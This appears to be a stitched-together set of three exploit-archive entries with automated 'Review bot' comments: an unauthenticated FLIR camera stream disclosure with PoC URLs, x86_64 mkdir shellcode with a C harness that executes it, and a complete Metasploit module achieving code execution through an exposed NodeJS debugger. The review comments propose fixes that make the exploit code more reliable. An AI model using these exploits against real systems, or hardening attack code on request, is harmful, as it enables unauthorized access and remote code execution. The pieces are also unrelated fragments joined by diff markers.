provide full 640x480 thermal resolution.
Desc: FLIR suffers from an unauthenticated and unauthorized live stream disclosure.
Tested on: Linux 2.6.18_pro500-davinci_evm-arm_v5t_le
Linux 2.6.10_mvl401-davinci_evm-PSP_01_30_00_082
Nexus Server/2.5.29.0
Nexus Server/2.5.14.0
Nexus Server/2.5.13.0
lighttpd/1.4.28
PHP/5.4.7
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5435
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5435.php
23.03.2017
--
PoC:
http://TARGET:8081/graphics/livevideo/stream/stream3.jpg
http://TARGET:8081/graphics/livevideo/stream/stream1.jpg
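Review bot: The PoC URLs use port 8081 while every other advisory in this set targets the lighttpd web UI, and nothing says which service answers there, whether it is enabled by default, or whether `streamN.jpg` is a single frame or a continuous MJPEG stream despite the "live stream" wording. Add a line such as `Port 8081: <service>, enabled by default; stream1.jpg/stream3.jpg return <a JPEG snapshot | an MJPEG stream> without any session.` Stating which of stream1–stream3 exist per model (thermal vs. visible) would also help. A mitigation line — block 8081 from untrusted networks, or a firmware version if the vendor fixed it — is missing.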


@ -0,0 +1,72 @@
/*
;Title: Linux/x86_64 - mkdir() shellcode (30 bytes)
;Author: Touhid M.Shaikh
;Contact: *https://github.com/touhidshaikh
<https://github.com/touhidshaikh>*
;Category: Shellcode
;Architecture: Linux x86_64
;Description: Create Folder with 755 permission.
; You can Change folder by change code in ASM in fname Field
;Shellcode Length: 30
;Tested on : Debian 4.12.6-1kali6 (2017-08-30) x86_64 GNU/Linux
===== COMPILATION AND EXECUTION Assemmbly file =====
#nasm -f elf64 shell.asm -o shell.o <=== Making Object File
#ld shell.o -o shell <=== Making Binary File
#./bin2shell.sh shell <== xtract hex code from the binary
(https://github.com/touhidshaikh/bin2shell)
=================SHELLCODE(INTEL FORMAT)=================
section .text
global _start
_start:
jmp folder
main:
xor rax,rax
pop rdi
mov si,0x1ef ;<--- Set Permission
add al,83
syscall
xor rax,rax
add al,60
syscall
folder:
call main
fname db "evil" ;<---Change Folder Name Here
=======================END HERE============================
====================FOR C Compile===========================
Compile with gcc with some options.
# gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = "\xeb\x13\x48\x31\xc0\x5f\x66\
xbe\xef\x01\x04\x53\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\
xe8\xe8\xff\xff\xff\x65\x76\x69\x6c";
main()
{
printf("Shellcode Length: %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
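Review bot: The mode operand `mov si,0x1ef` is 0757, not the 0755 the header claims (0755 is 0x1ed); under the usual 022 umask the directory still comes out 0755, which would hide the discrepancy in testing, so either change the operand to `mov si,0x1ed ;<--- 0755` or correct the comment. `fname db "evil"` has no terminating zero: the C harness works only because the string literal appends one, but injected anywhere else the pathname continues into whatever bytes follow. `fname db "evil",0` fixes that at the cost of one byte (31), or the header should state that the caller must place a NUL after the blob. Separately, `main()` with an implicit `int` return type is invalid in C99 and later; `int main(void)` avoids the warning-as-error on current compilers.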


@ -0,0 +1,90 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
MESSAGE_HEADER_TEMPLATE = "Content-Length: %{length}\r\n\r\n"
def initialize(info={})
super(update_info(info,
'Name' => "NodeJS Debugger Command Injection",
'Description' => %q{
This module uses the "evaluate" request type of the NodeJS V8
debugger protocol (version 1) to evaluate arbitrary JS and
call out to other system commands. The port (default 5858) is
not exposed non-locally in default configurations, but may be
exposed either intentionally or via misconfiguration.
},
'License' => MSF_LICENSE,
'Author' => [ 'Patrick Thomas <pst[at]coffeetocode.net>' ],
'References' =>
[
[ 'URL', 'https://github.com/buggerjs/bugger-v8-client/blob/master/PROTOCOL.md' ],
[ 'URL', 'https://github.com/nodejs/node/pull/8106' ]
],
'Targets' =>
[
['NodeJS', { 'Platform' => 'nodejs', 'Arch' => 'nodejs' } ],
],
'Privileged' => false,
'DisclosureDate' => "Aug 15 2016",
'DefaultTarget' => 0)
)
register_options(
[
Opt::RPORT(5858)
])
end
def make_eval_message
msg_body = { seq: 1,
type: 'request',
command: 'evaluate',
arguments: { expression: payload.encoded,
global: true,
maxStringLength:-1
}
}.to_json
msg_header = MESSAGE_HEADER_TEMPLATE % {:length => msg_body.length}
msg_header + msg_body
end
def check
connect
res = sock.get_once
disconnect
if res.include? "V8-Version" and res.include? "Protocol-Version: 1"
vprint_status("Got debugger handshake:\n#{res}")
return Exploit::CheckCode::Appears
end
Exploit::CheckCode::Unknown
end
def exploit
connect
# must consume incoming handshake before sending payload
buf = sock.get_once
msg = make_eval_message
print_status("Sending #{msg.length} byte payload...")
vprint_status("#{msg}")
sock.put(msg)
buf = sock.get_once
if buf.include? '"command":"evaluate","success":true'
print_status("Got success response")
elsif buf.include? '"command":"evaluate","success":false'
print_error("Got failure response: #{buf}")
else
print_error("Got unexpected response: #{buf}")
end
end
end
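Review bot: Both `check` and `exploit` call `include?` on the result of `sock.get_once` without a nil guard, so a target that accepts the TCP connection but sends nothing (or closes early) raises `NoMethodError` instead of returning a CheckCode or a clean failure. In `check` add `return Exploit::CheckCode::Unknown unless res` right after `disconnect`; in `exploit` replace the unused first `buf = sock.get_once` with `fail_with(Failure::Unreachable, 'No debugger handshake received') unless sock.get_once`, and guard the second read the same way before the `include?` chain. `exploit` never disconnects; wrapping its body in `begin … ensure disconnect end` matches what `check` already does. The header is built with `msg_body.length`, a character count — `msg_body.bytesize` is the correct `Content-Length` should the encoded payload ever contain non-ASCII bytes, and the `and` in `check` should be `&&` to avoid Ruby's low-precedence trap.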